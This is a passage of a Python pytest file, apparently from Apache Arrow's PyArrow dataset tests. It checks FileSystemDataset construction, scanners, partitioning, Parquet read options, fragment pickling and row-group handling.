paths = ['subdir/1/xxx/file0.parquet', 'subdir/2/yyy/file1.parquet']
partitions = [ds.field('part') == x for x in range(1, 3)]
fragments = [file_format.make_fragment(path, mockfs, part)
for path, part in zip(paths, partitions)]
root_partition = ds.field('level') == ds.scalar(1337)
dataset_from_fragments = ds.FileSystemDataset(
fragments, schema=schema, format=file_format,
filesystem=mockfs, root_partition=root_partition,
)
dataset_from_paths = ds.FileSystemDataset.from_paths(
paths, schema=schema, format=file_format, filesystem=mockfs,
partitions=partitions, root_partition=root_partition,
)
for dataset in [dataset_from_fragments, dataset_from_paths]:
assert isinstance(dataset, ds.FileSystemDataset)
assert isinstance(dataset.format, ds.ParquetFileFormat)
assert dataset.partition_expression.equals(root_partition)
assert set(dataset.files) == set(paths)
fragments = list(dataset.get_fragments())
for fragment, partition, path in zip(fragments, partitions, paths):
assert fragment.partition_expression.equals(partition)
assert fragment.path == path
assert isinstance(fragment.format, ds.ParquetFileFormat)
assert isinstance(fragment, ds.ParquetFileFragment)
assert fragment.row_groups == [0]
assert fragment.num_row_groups == 1
row_group_fragments = list(fragment.split_by_row_group())
assert fragment.num_row_groups == len(row_group_fragments) == 1
assert isinstance(row_group_fragments[0], ds.ParquetFileFragment)
assert row_group_fragments[0].path == path
assert row_group_fragments[0].row_groups == [0]
assert row_group_fragments[0].num_row_groups == 1
fragments = list(dataset.get_fragments(filter=ds.field("const") == 0))
assert len(fragments) == 2
# the root_partition keyword has a default
dataset = ds.FileSystemDataset(
fragments, schema=schema, format=file_format, filesystem=mockfs
)
assert dataset.partition_expression.equals(ds.scalar(True))
# from_paths partitions have defaults
dataset = ds.FileSystemDataset.from_paths(
paths, schema=schema, format=file_format, filesystem=mockfs
)
assert dataset.partition_expression.equals(ds.scalar(True))
for fragment in dataset.get_fragments():
assert fragment.partition_expression.equals(ds.scalar(True))
# validation of required arguments
with pytest.raises(TypeError, match="incorrect type"):
ds.FileSystemDataset(fragments, file_format, schema)
# validation of root_partition
with pytest.raises(TypeError, match="incorrect type"):
ds.FileSystemDataset(fragments, schema=schema,
format=file_format, root_partition=1)
# missing required argument in from_paths
with pytest.raises(TypeError, match="incorrect type"):
ds.FileSystemDataset.from_paths(fragments, format=file_format)
def test_filesystem_dataset_no_filesystem_interaction(dataset_reader):
# ARROW-8283
schema = pa.schema([
pa.field('f1', pa.int64())
])
file_format = ds.IpcFileFormat()
paths = ['nonexistingfile.arrow']
# creating the dataset itself doesn't raise
dataset = ds.FileSystemDataset.from_paths(
paths, schema=schema, format=file_format,
filesystem=fs.LocalFileSystem(),
)
# getting fragments also doesn't raise
dataset.get_fragments()
# scanning does raise
with pytest.raises(FileNotFoundError):
dataset_reader.to_table(dataset)
@pytest.mark.parquet
def test_dataset(dataset, dataset_reader):
assert isinstance(dataset, ds.Dataset)
assert isinstance(dataset.schema, pa.Schema)
# TODO(kszucs): test non-boolean Exprs for filter do raise
expected_i64 = pa.array([0, 1, 2, 3, 4], type=pa.int64())
expected_f64 = pa.array([0, 1, 2, 3, 4], type=pa.float64())
for batch in dataset_reader.to_batches(dataset):
assert isinstance(batch, pa.RecordBatch)
assert batch.column(0).equals(expected_i64)
assert batch.column(1).equals(expected_f64)
for batch in dataset_reader.scanner(dataset).scan_batches():
assert isinstance(batch, ds.TaggedRecordBatch)
assert isinstance(batch.fragment, ds.Fragment)
table = dataset_reader.to_table(dataset)
assert isinstance(table, pa.Table)
assert len(table) == 10
condition = ds.field('i64') == 1
result = dataset.to_table(use_threads=True, filter=condition)
# Don't rely on the scanning order
result = result.sort_by('group').to_pydict()
assert result['i64'] == [1, 1]
assert result['f64'] == [1., 1.]
assert sorted(result['group']) == [1, 2]
assert sorted(result['key']) == ['xxx', 'yyy']
# Filtering on a nested field ref
condition = ds.field(('struct', 'b')) == '1'
result = dataset.to_table(use_threads=True, filter=condition)
result = result.sort_by('group').to_pydict()
assert result['i64'] == [1, 4, 1, 4]
assert result['f64'] == [1.0, 4.0, 1.0, 4.0]
assert result['group'] == [1, 1, 2, 2]
assert result['key'] == ['xxx', 'xxx', 'yyy', 'yyy']
# Projecting on a nested field ref expression
projection = {
'i64': ds.field('i64'),
'f64': ds.field('f64'),
'new': ds.field(('struct', 'b')) == '1',
}
result = dataset.to_table(use_threads=True, columns=projection)
result = result.sort_by('i64').to_pydict()
assert list(result) == ['i64', 'f64', 'new']
assert result['i64'] == [0, 0, 1, 1, 2, 2, 3, 3, 4, 4]
assert result['f64'] == [0.0, 0.0, 1.0, 1.0,
2.0, 2.0, 3.0, 3.0, 4.0, 4.0]
assert result['new'] == [False, False, True, True, False, False,
False, False, True, True]
@pytest.mark.parquet
def test_scanner_options(dataset):
scanner = dataset.to_batches(fragment_readahead=16, batch_readahead=8)
batch = next(scanner)
assert batch.num_columns == 7
@pytest.mark.parquet
def test_scanner(dataset, dataset_reader):
scanner = dataset_reader.scanner(
dataset, memory_pool=pa.default_memory_pool())
assert isinstance(scanner, ds.Scanner)
with pytest.raises(pa.ArrowInvalid):
dataset_reader.scanner(dataset, columns=['unknown'])
scanner = dataset_reader.scanner(dataset, columns=['i64'],
memory_pool=pa.default_memory_pool())
assert scanner.dataset_schema == dataset.schema
assert scanner.projected_schema == pa.schema([("i64", pa.int64())])
assert isinstance(scanner, ds.Scanner)
table = scanner.to_table()
for batch in scanner.to_batches():
assert batch.schema == scanner.projected_schema
assert batch.num_columns == 1
assert table == scanner.to_reader().read_all()
assert table.schema == scanner.projected_schema
for i in range(table.num_rows):
indices = pa.array([i])
assert table.take(indices) == scanner.take(indices)
with pytest.raises(pa.ArrowIndexError):
scanner.take(pa.array([table.num_rows]))
assert table.num_rows == scanner.count_rows()
scanner = dataset_reader.scanner(dataset, columns=['__filename',
'__fragment_index',
'__batch_index',
'__last_in_fragment'],
memory_pool=pa.default_memory_pool())
table = scanner.to_table()
expected_names = ['__filename', '__fragment_index',
'__batch_index', '__last_in_fragment']
assert table.column_names == expected_names
sorted_table = table.sort_by('__fragment_index')
assert sorted_table['__filename'].to_pylist() == (
['subdir/1/xxx/file0.parquet'] * 5 +
['subdir/2/yyy/file1.parquet'] * 5)
assert sorted_table['__fragment_index'].to_pylist() == ([0] * 5 + [1] * 5)
assert sorted_table['__batch_index'].to_pylist() == [0] * 10
assert sorted_table['__last_in_fragment'].to_pylist() == [True] * 10
@pytest.mark.parquet
def test_scanner_async_deprecated(dataset):
with pytest.warns(FutureWarning):
dataset.scanner(use_async=False)
with pytest.warns(FutureWarning):
dataset.scanner(use_async=True)
with pytest.warns(FutureWarning):
dataset.to_table(use_async=False)
with pytest.warns(FutureWarning):
dataset.to_table(use_async=True)
with pytest.warns(FutureWarning):
dataset.head(1, use_async=False)
with pytest.warns(FutureWarning):
dataset.head(1, use_async=True)
with pytest.warns(FutureWarning):
ds.Scanner.from_dataset(dataset, use_async=False)
with pytest.warns(FutureWarning):
ds.Scanner.from_dataset(dataset, use_async=True)
with pytest.warns(FutureWarning):
ds.Scanner.from_fragment(
next(dataset.get_fragments()), use_async=False)
with pytest.warns(FutureWarning):
ds.Scanner.from_fragment(
next(dataset.get_fragments()), use_async=True)
@pytest.mark.parquet
def test_head(dataset, dataset_reader):
result = dataset_reader.head(dataset, 0)
assert result == pa.Table.from_batches([], schema=dataset.schema)
result = dataset_reader.head(dataset, 1, columns=['i64']).to_pydict()
assert result == {'i64': [0]}
result = dataset_reader.head(dataset, 2, columns=['i64'],
filter=ds.field('i64') > 1).to_pydict()
assert result == {'i64': [2, 3]}
result = dataset_reader.head(dataset, 1024, columns=['i64']).to_pydict()
assert result == {'i64': list(range(5)) * 2}
fragment = next(dataset.get_fragments())
result = fragment.head(1, columns=['i64']).to_pydict()
assert result == {'i64': [0]}
result = fragment.head(1024, columns=['i64']).to_pydict()
assert result == {'i64': list(range(5))}
@pytest.mark.parquet
def test_take(dataset, dataset_reader):
fragment = next(dataset.get_fragments())
for indices in [[1, 3], pa.array([1, 3])]:
expected = dataset_reader.to_table(fragment).take(indices)
assert dataset_reader.take(fragment, indices) == expected
with pytest.raises(IndexError):
dataset_reader.take(fragment, pa.array([5]))
for indices in [[1, 7], pa.array([1, 7])]:
assert dataset_reader.take(
dataset, indices) == dataset_reader.to_table(dataset).take(indices)
with pytest.raises(IndexError):
dataset_reader.take(dataset, pa.array([10]))
@pytest.mark.parquet
def test_count_rows(dataset, dataset_reader):
fragment = next(dataset.get_fragments())
assert dataset_reader.count_rows(fragment) == 5
assert dataset_reader.count_rows(
fragment, filter=ds.field("i64") == 4) == 1
assert dataset_reader.count_rows(dataset) == 10
# Filter on partition key
assert dataset_reader.count_rows(
dataset, filter=ds.field("group") == 1) == 5
# Filter on data
assert dataset_reader.count_rows(dataset, filter=ds.field("i64") >= 3) == 4
assert dataset_reader.count_rows(dataset, filter=ds.field("i64") < 0) == 0
def test_abstract_classes():
classes = [
ds.FileFormat,
ds.Scanner,
ds.Partitioning,
]
for klass in classes:
with pytest.raises(TypeError):
klass()
def test_partitioning():
schema = pa.schema([
pa.field('i64', pa.int64()),
pa.field('f64', pa.float64())
])
for klass in [ds.DirectoryPartitioning, ds.HivePartitioning,
ds.FilenamePartitioning]:
partitioning = klass(schema)
assert isinstance(partitioning, ds.Partitioning)
partitioning = ds.DirectoryPartitioning(
pa.schema([
pa.field('group', pa.int64()),
pa.field('key', pa.float64())
])
)
assert len(partitioning.dictionaries) == 2
assert all(x is None for x in partitioning.dictionaries)
expr = partitioning.parse('/3/3.14/')
assert isinstance(expr, ds.Expression)
expected = (ds.field('group') == 3) & (ds.field('key') == 3.14)
assert expr.equals(expected)
with pytest.raises(pa.ArrowInvalid):
partitioning.parse('/prefix/3/aaa')
expr = partitioning.parse('/3/')
expected = ds.field('group') == 3
assert expr.equals(expected)
partitioning = ds.HivePartitioning(
pa.schema([
pa.field('alpha', pa.int64()),
pa.field('beta', pa.int64())
]),
null_fallback='xyz'
)
assert len(partitioning.dictionaries) == 2
assert all(x is None for x in partitioning.dictionaries)
expr = partitioning.parse('/alpha=0/beta=3/')
expected = (
(ds.field('alpha') == ds.scalar(0)) &
(ds.field('beta') == ds.scalar(3))
)
assert expr.equals(expected)
expr = partitioning.parse('/alpha=xyz/beta=3/')
expected = (
(ds.field('alpha').is_null() & (ds.field('beta') == ds.scalar(3)))
)
assert expr.equals(expected)
for shouldfail in ['/alpha=one/beta=2/', '/alpha=one/', '/beta=two/']:
with pytest.raises(pa.ArrowInvalid):
partitioning.parse(shouldfail)
partitioning = ds.FilenamePartitioning(
pa.schema([
pa.field('group', pa.int64()),
pa.field('key', pa.float64())
])
)
assert len(partitioning.dictionaries) == 2
assert all(x is None for x in partitioning.dictionaries)
expr = partitioning.parse('3_3.14_')
assert isinstance(expr, ds.Expression)
expected = (ds.field('group') == 3) & (ds.field('key') == 3.14)
assert expr.equals(expected)
with pytest.raises(pa.ArrowInvalid):
partitioning.parse('prefix_3_aaa_')
partitioning = ds.DirectoryPartitioning(
pa.schema([
pa.field('group', pa.int64()),
pa.field('key', pa.dictionary(pa.int8(), pa.string()))
]),
dictionaries={
"key": pa.array(["first", "second", "third"]),
})
assert partitioning.dictionaries[0] is None
assert partitioning.dictionaries[1].to_pylist() == [
"first", "second", "third"]
partitioning = ds.FilenamePartitioning(
pa.schema([
pa.field('group', pa.int64()),
pa.field('key', pa.dictionary(pa.int8(), pa.string()))
]),
dictionaries={
"key": pa.array(["first", "second", "third"]),
})
assert partitioning.dictionaries[0] is None
assert partitioning.dictionaries[1].to_pylist() == [
"first", "second", "third"]
# test partitioning roundtrip
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))],
names=["f1", "f2", "part"]
)
partitioning_schema = pa.schema([("part", pa.string())])
for klass in [ds.DirectoryPartitioning, ds.HivePartitioning,
ds.FilenamePartitioning]:
with tempfile.TemporaryDirectory() as tempdir:
partitioning = klass(partitioning_schema)
ds.write_dataset(table, tempdir,
format='ipc', partitioning=partitioning)
load_back = ds.dataset(tempdir, format='ipc',
partitioning=partitioning)
load_back_table = load_back.to_table()
assert load_back_table.equals(table)
def test_expression_arithmetic_operators():
dataset = ds.dataset(pa.table({'a': [1, 2, 3], 'b': [2, 2, 2]}))
a = ds.field("a")
b = ds.field("b")
result = dataset.to_table(columns={
"a+1": a + 1,
"b-a": b - a,
"a*2": a * 2,
"a/b": a.cast("float64") / b,
})
expected = pa.table({
"a+1": [2, 3, 4], "b-a": [1, 0, -1],
"a*2": [2, 4, 6], "a/b": [0.5, 1.0, 1.5],
})
assert result.equals(expected)
def test_partition_keys():
a, b, c = [ds.field(f) == f for f in 'abc']
assert ds._get_partition_keys(a) == {'a': 'a'}
assert ds._get_partition_keys(a & b & c) == {f: f for f in 'abc'}
nope = ds.field('d') >= 3
assert ds._get_partition_keys(nope) == {}
assert ds._get_partition_keys(a & nope) == {'a': 'a'}
null = ds.field('a').is_null()
assert ds._get_partition_keys(null) == {'a': None}
@pytest.mark.parquet
def test_parquet_read_options():
opts1 = ds.ParquetReadOptions()
opts2 = ds.ParquetReadOptions(dictionary_columns=['a', 'b'])
opts3 = ds.ParquetReadOptions(coerce_int96_timestamp_unit="ms")
assert opts1.dictionary_columns == set()
assert opts2.dictionary_columns == {'a', 'b'}
assert opts1.coerce_int96_timestamp_unit == "ns"
assert opts3.coerce_int96_timestamp_unit == "ms"
assert opts1 == opts1
assert opts1 != opts2
assert opts1 != opts3
@pytest.mark.parquet
def test_parquet_file_format_read_options():
pff1 = ds.ParquetFileFormat()
pff2 = ds.ParquetFileFormat(dictionary_columns={'a'})
pff3 = ds.ParquetFileFormat(coerce_int96_timestamp_unit="s")
assert pff1.read_options == ds.ParquetReadOptions()
assert pff2.read_options == ds.ParquetReadOptions(dictionary_columns=['a'])
assert pff3.read_options == ds.ParquetReadOptions(
coerce_int96_timestamp_unit="s")
@pytest.mark.parquet
def test_parquet_scan_options():
opts1 = ds.ParquetFragmentScanOptions()
opts2 = ds.ParquetFragmentScanOptions(buffer_size=4096)
opts3 = ds.ParquetFragmentScanOptions(
buffer_size=2**13, use_buffered_stream=True)
opts4 = ds.ParquetFragmentScanOptions(buffer_size=2**13, pre_buffer=True)
opts5 = ds.ParquetFragmentScanOptions(
thrift_string_size_limit=123456,
thrift_container_size_limit=987654,)
assert opts1.use_buffered_stream is False
assert opts1.buffer_size == 2**13
assert opts1.pre_buffer is False
assert opts1.thrift_string_size_limit == 100_000_000 # default in C++
assert opts1.thrift_container_size_limit == 1_000_000 # default in C++
assert opts2.use_buffered_stream is False
assert opts2.buffer_size == 2**12
assert opts2.pre_buffer is False
assert opts3.use_buffered_stream is True
assert opts3.buffer_size == 2**13
assert opts3.pre_buffer is False
assert opts4.use_buffered_stream is False
assert opts4.buffer_size == 2**13
assert opts4.pre_buffer is True
assert opts5.thrift_string_size_limit == 123456
assert opts5.thrift_container_size_limit == 987654
assert opts1 == opts1
assert opts1 != opts2
assert opts2 != opts3
assert opts3 != opts4
assert opts5 != opts1
def test_file_format_pickling():
formats = [
ds.IpcFileFormat(),
ds.CsvFileFormat(),
ds.CsvFileFormat(pa.csv.ParseOptions(delimiter='\t',
ignore_empty_lines=True)),
ds.CsvFileFormat(read_options=pa.csv.ReadOptions(
skip_rows=3, column_names=['foo'])),
ds.CsvFileFormat(read_options=pa.csv.ReadOptions(
skip_rows=3, block_size=2**20)),
]
try:
formats.append(ds.OrcFileFormat())
except ImportError:
pass
if pq is not None:
formats.extend([
ds.ParquetFileFormat(),
ds.ParquetFileFormat(dictionary_columns={'a'}),
ds.ParquetFileFormat(use_buffered_stream=True),
ds.ParquetFileFormat(
use_buffered_stream=True,
buffer_size=4096,
thrift_string_size_limit=123,
thrift_container_size_limit=456,
),
])
for file_format in formats:
assert pickle.loads(pickle.dumps(file_format)) == file_format
def test_fragment_scan_options_pickling():
options = [
ds.CsvFragmentScanOptions(),
ds.CsvFragmentScanOptions(
convert_options=pa.csv.ConvertOptions(strings_can_be_null=True)),
ds.CsvFragmentScanOptions(
read_options=pa.csv.ReadOptions(block_size=2**16)),
]
if pq is not None:
options.extend([
ds.ParquetFragmentScanOptions(buffer_size=4096),
ds.ParquetFragmentScanOptions(pre_buffer=True),
])
for option in options:
assert pickle.loads(pickle.dumps(option)) == option
@pytest.mark.parametrize('paths_or_selector', [
fs.FileSelector('subdir', recursive=True),
[
'subdir/1/xxx/file0.parquet',
'subdir/2/yyy/file1.parquet',
]
])
@pytest.mark.parametrize('pre_buffer', [False, True])
@pytest.mark.parquet
def test_filesystem_factory(mockfs, paths_or_selector, pre_buffer):
format = ds.ParquetFileFormat(
read_options=ds.ParquetReadOptions(dictionary_columns={"str"}),
pre_buffer=pre_buffer
)
options = ds.FileSystemFactoryOptions('subdir')
options.partitioning = ds.DirectoryPartitioning(
pa.schema([
pa.field('group', pa.int32()),
pa.field('key', pa.string())
])
)
assert options.partition_base_dir == 'subdir'
assert options.selector_ignore_prefixes == ['.', '_']
assert options.exclude_invalid_files is False
factory = ds.FileSystemDatasetFactory(
mockfs, paths_or_selector, format, options
)
inspected_schema = factory.inspect()
assert factory.inspect().equals(pa.schema([
pa.field('i64', pa.int64()),
pa.field('f64', pa.float64()),
pa.field('str', pa.dictionary(pa.int32(), pa.string())),
pa.field('const', pa.int64()),
pa.field('struct', pa.struct({'a': pa.int64(),
'b': pa.string()})),
pa.field('group', pa.int32()),
pa.field('key', pa.string()),
]), check_metadata=False)
assert isinstance(factory.inspect_schemas(), list)
assert isinstance(factory.finish(inspected_schema),
ds.FileSystemDataset)
assert factory.root_partition.equals(ds.scalar(True))
dataset = factory.finish()
assert isinstance(dataset, ds.FileSystemDataset)
scanner = dataset.scanner()
expected_i64 = pa.array([0, 1, 2, 3, 4], type=pa.int64())
expected_f64 = pa.array([0, 1, 2, 3, 4], type=pa.float64())
expected_str = pa.DictionaryArray.from_arrays(
pa.array([0, 1, 2, 3, 4], type=pa.int32()),
pa.array("0 1 2 3 4".split(), type=pa.string())
)
expected_struct = pa.array([{'a': i % 3, 'b': str(i % 3)}
for i in range(5)])
iterator = scanner.scan_batches()
for (batch, fragment), group, key in zip(iterator, [1, 2], ['xxx', 'yyy']):
expected_group = pa.array([group] * 5, type=pa.int32())
expected_key = pa.array([key] * 5, type=pa.string())
expected_const = pa.array([group - 1] * 5, type=pa.int64())
# Can't compare or really introspect expressions from Python
assert fragment.partition_expression is not None
assert batch.num_columns == 7
assert batch[0].equals(expected_i64)
assert batch[1].equals(expected_f64)
assert batch[2].equals(expected_str)
assert batch[3].equals(expected_const)
assert batch[4].equals(expected_struct)
assert batch[5].equals(expected_group)
assert batch[6].equals(expected_key)
table = dataset.to_table()
assert isinstance(table, pa.Table)
assert len(table) == 10
assert table.num_columns == 7
@pytest.mark.parquet
def test_make_fragment(multisourcefs):
parquet_format = ds.ParquetFileFormat()
dataset = ds.dataset('/plain', filesystem=multisourcefs,
format=parquet_format)
for path in dataset.files:
fragment = parquet_format.make_fragment(path, multisourcefs)
assert fragment.row_groups == [0]
row_group_fragment = parquet_format.make_fragment(path, multisourcefs,
row_groups=[0])
for f in [fragment, row_group_fragment]:
assert isinstance(f, ds.ParquetFileFragment)
assert f.path == path
assert isinstance(f.filesystem, type(multisourcefs))
assert row_group_fragment.row_groups == [0]
def test_make_csv_fragment_from_buffer(dataset_reader):
content = textwrap.dedent("""
alpha,num,animal
a,12,dog
b,11,cat
c,10,rabbit
""")
buffer = pa.py_buffer(content.encode('utf-8'))
csv_format = ds.CsvFileFormat()
fragment = csv_format.make_fragment(buffer)
expected = pa.table([['a', 'b', 'c'],
[12, 11, 10],
['dog', 'cat', 'rabbit']],
names=['alpha', 'num', 'animal'])
assert dataset_reader.to_table(fragment).equals(expected)
pickled = pickle.loads(pickle.dumps(fragment))
assert dataset_reader.to_table(pickled).equals(fragment.to_table())
@pytest.mark.parquet
def test_make_parquet_fragment_from_buffer(dataset_reader):
arrays = [
pa.array(['a', 'b', 'c']),
pa.array([12, 11, 10]),
pa.array(['dog', 'cat', 'rabbit'])
]
dictionary_arrays = [
arrays[0].dictionary_encode(),
arrays[1],
arrays[2].dictionary_encode()
]
dictionary_format = ds.ParquetFileFormat(
read_options=ds.ParquetReadOptions(
dictionary_columns=['alpha', 'animal']
),
use_buffered_stream=True,
buffer_size=4096,
)
cases = [
(arrays, ds.ParquetFileFormat()),
(dictionary_arrays, dictionary_format)
]
for arrays, format_ in cases:
table = pa.table(arrays, names=['alpha', 'num', 'animal'])
out = pa.BufferOutputStream()
pq.write_table(table, out)
buffer = out.getvalue()
fragment = format_.make_fragment(buffer)
assert dataset_reader.to_table(fragment).equals(table)
pickled = pickle.loads(pickle.dumps(fragment))
assert dataset_reader.to_table(pickled).equals(table)
@pytest.mark.parquet
def _create_dataset_for_fragments(tempdir, chunk_size=None, filesystem=None):
table = pa.table(
[range(8), [1] * 8, ['a'] * 4 + ['b'] * 4],
names=['f1', 'f2', 'part']
)
path = str(tempdir / "test_parquet_dataset")
# write_to_dataset currently requires pandas
pq.write_to_dataset(table, path,
partition_cols=["part"], chunk_size=chunk_size)
dataset = ds.dataset(
path, format="parquet", partitioning="hive", filesystem=filesystem
)
return table, dataset
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments(tempdir, dataset_reader):
table, dataset = _create_dataset_for_fragments(tempdir)
# list fragments
fragments = list(dataset.get_fragments())
assert len(fragments) == 2
f = fragments[0]
physical_names = ['f1', 'f2']
# file's schema does not include partition column
assert f.physical_schema.names == physical_names
assert f.format.inspect(f.path, f.filesystem) == f.physical_schema
assert f.partition_expression.equals(ds.field('part') == 'a')
# By default, the partition column is not part of the schema.
result = dataset_reader.to_table(f)
assert result.column_names == physical_names
assert result.equals(table.remove_column(2).slice(0, 4))
# scanning fragment includes partition columns when given the proper
# schema.
result = dataset_reader.to_table(f, schema=dataset.schema)
assert result.column_names == ['f1', 'f2', 'part']
assert result.equals(table.slice(0, 4))
assert f.physical_schema == result.schema.remove(2)
# scanning fragments follow filter predicate
result = dataset_reader.to_table(
f, schema=dataset.schema, filter=ds.field('f1') < 2)
assert result.column_names == ['f1', 'f2', 'part']
@pytest.mark.pandas
@pytest.mark.parquet
def test_fragments_implicit_cast(tempdir):
# ARROW-8693
table = pa.table([range(8), [1] * 4 + [2] * 4], names=['col', 'part'])
path = str(tempdir / "test_parquet_dataset")
pq.write_to_dataset(table, path, partition_cols=["part"])
part = ds.partitioning(pa.schema([('part', 'int8')]), flavor="hive")
dataset = ds.dataset(path, format="parquet", partitioning=part)
fragments = dataset.get_fragments(filter=ds.field("part") >= 2)
assert len(list(fragments)) == 1
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_reconstruct(tempdir, dataset_reader):
table, dataset = _create_dataset_for_fragments(tempdir)
def assert_yields_projected(fragment, row_slice,
columns=None, filter=None):
actual = fragment.to_table(
schema=table.schema, columns=columns, filter=filter)
column_names = columns if columns else table.column_names
assert actual.column_names == column_names
expected = table.slice(*row_slice).select(column_names)
assert actual.equals(expected)
fragment = list(dataset.get_fragments())[0]
parquet_format = fragment.format
# test pickle roundtrip
pickled_fragment = pickle.loads(pickle.dumps(fragment))
assert dataset_reader.to_table(
pickled_fragment) == dataset_reader.to_table(fragment)
# manually re-construct a fragment, with explicit schema
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
assert dataset_reader.to_table(new_fragment).equals(
dataset_reader.to_table(fragment))
assert_yields_projected(new_fragment, (0, 4))
# filter / column projection, inspected schema
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
assert_yields_projected(new_fragment, (0, 2), filter=ds.field('f1') < 2)
# filter requiring cast / column projection, inspected schema
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
assert_yields_projected(new_fragment, (0, 2),
columns=['f1'], filter=ds.field('f1') < 2.0)
# filter on the partition column
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
assert_yields_projected(new_fragment, (0, 4),
filter=ds.field('part') == 'a')
# Fragments don't contain the partition's columns if not provided to the
# `to_table(schema=...)` method.
pattern = (r'No match for FieldRef.Name\(part\) in ' +
fragment.physical_schema.to_string(False, False, False))
with pytest.raises(ValueError, match=pattern):
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
dataset_reader.to_table(new_fragment, filter=ds.field('part') == 'a')
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_row_groups(tempdir, dataset_reader):
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=2)
fragment = list(dataset.get_fragments())[0]
# list and scan row group fragments
row_group_fragments = list(fragment.split_by_row_group())
assert len(row_group_fragments) == fragment.num_row_groups == 2
result = dataset_reader.to_table(
row_group_fragments[0], schema=dataset.schema)
assert result.column_names == ['f1', 'f2', 'part']
assert len(result) == 2
assert result.equals(table.slice(0, 2))
assert row_group_fragments[0].row_groups is not None
assert row_group_fragments[0].num_row_groups == 1
assert row_group_fragments[0].row_groups[0].statistics == {
'f1': {'min': 0, 'max': 1},
'f2': {'min': 1, 'max': 1},
}
fragment = list(dataset.get_fragments(filter=ds.field('f1') < 1))[0]
row_group_fragments = list(fragment.split_by_row_group(ds.field('f1') < 1))
assert len(row_group_fragments) == 1
result = dataset_reader.to_table(
row_group_fragments[0], filter=ds.field('f1') < 1)
assert len(result) == 1
@pytest.mark.parquet
def test_fragments_parquet_num_row_groups(tempdir):
table = pa.table({'a': range(8)})
pq.write_table(table, tempdir / "test.parquet", row_group_size=2)
dataset = ds.dataset(tempdir / "test.parquet", format="parquet")
original_fragment = list(dataset.get_fragments())[0]
# create fragment with subset of row groups
fragment = original_fragment.format.make_fragment(
original_fragment.path, original_fragment.filesystem,
row_groups=[1, 3])
assert fragment.num_row_groups == 2
# ensure that parsing metadata preserves correct number of row groups
fragment.ensure_complete_metadata()
assert fragment.num_row_groups == 2
assert len(fragment.row_groups) == 2
@pytest.mark.pandas
@pytest.mark.parquet
def test_fragments_parquet_row_groups_dictionary(tempdir, dataset_reader):
import pandas as pd
df = pd.DataFrame(dict(col1=['a', 'b'], col2=[1, 2]))
df['col1'] = df['col1'].astype("category")
pq.write_table(pa.table(df), tempdir / "test_filter_dictionary.parquet")
import pyarrow.dataset as ds
dataset = ds.dataset(tempdir / 'test_filter_dictionary.parquet')
result = dataset_reader.to_table(dataset, filter=ds.field("col1") == "a")
assert (df.iloc[0] == result.to_pandas()).all().all()
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_ensure_metadata(tempdir, open_logging_fs):
fs, assert_opens = open_logging_fs
_, dataset = _create_dataset_for_fragments(
tempdir, chunk_size=2, filesystem=fs
)
fragment = list(dataset.get_fragments())[0]
# with default discovery, no metadata loaded
with assert_opens([fragment.path]):
fragment.ensure_complete_metadata()
assert fragment.row_groups == [0, 1]
# second time -> use cached / no file IO
with assert_opens([]):
fragment.ensure_complete_metadata()
# recreate fragment with row group ids
new_fragment = fragment.format.make_fragment(
fragment.path, fragment.filesystem, row_groups=[0, 1]
)
assert new_fragment.row_groups == fragment.row_groups
# collect metadata
new_fragment.ensure_complete_metadata()
row_group = new_fragment.row_groups[0]
assert row_group.id == 0
assert row_group.num_rows == 2
assert row_group.statistics is not None
# pickling preserves row group ids
pickled_fragment = pickle.loads(pickle.dumps(new_fragment))
with assert_opens([fragment.path]):
assert pickled_fragment.row_groups == [0, 1]
row_group = pickled_fragment.row_groups[0]
assert row_group.id == 0
assert row_group.statistics is not None
@pytest.mark.pandas
@pytest.mark.parquet
def test_fragments_parquet_pickle_no_metadata(tempdir, open_logging_fs):
# https://issues.apache.org/jira/browse/ARROW-15796
fs, assert_opens = open_logging_fs
_, dataset = _create_dataset_for_fragments(tempdir, filesystem=fs)
fragment = list(dataset.get_fragments())[1]
# second fragment hasn't yet loaded the metadata,
# and pickling it also should not read the metadata
with assert_opens([]):
pickled_fragment = pickle.loads(pickle.dumps(fragment))
# then accessing the row group info reads the metadata
with assert_opens([pickled_fragment.path]):
row_groups = pickled_fragment.row_groups
assert row_groups == [0]
def _create_dataset_all_types(tempdir, chunk_size=None):
table = pa.table(
[
pa.array([True, None, False], pa.bool_()),
pa.array([1, 10, 42], pa.int8()),
pa.array([1, 10, 42], pa.uint8()),
pa.array([1, 10, 42], pa.int16()),
pa.array([1, 10, 42], pa.uint16()),
pa.array([1, 10, 42], pa.int32()),
pa.array([1, 10, 42], pa.uint32()),
pa.array([1, 10, 42], pa.int64()),
pa.array([1, 10, 42], pa.uint64()),
pa.array([1.0, 10.0, 42.0], pa.float32()),
pa.array([1.0, 10.0, 42.0], pa.float64()),
pa.array(['a', None, 'z'], pa.utf8()),
pa.array(['a', None, 'z'], pa.binary()),
pa.array([1, 10, 42], pa.timestamp('s')),
pa.array([1, 10, 42], pa.timestamp('ms')),
pa.array([1, 10, 42], pa.timestamp('us')),
pa.array([1, 10, 42], pa.date32()),
pa.array([1, 10, 4200000000], pa.date64()),
pa.array([1, 10, 42], pa.time32('s')),
pa.array([1, 10, 42], pa.time64('us')),
],
names=[
'boolean',
'int8',
'uint8',
'int16',
'uint16',
'int32',
'uint32',
'int64',
'uint64',
'float',
'double',
'utf8',
'binary',
'ts[s]',
'ts[ms]',
'ts[us]',
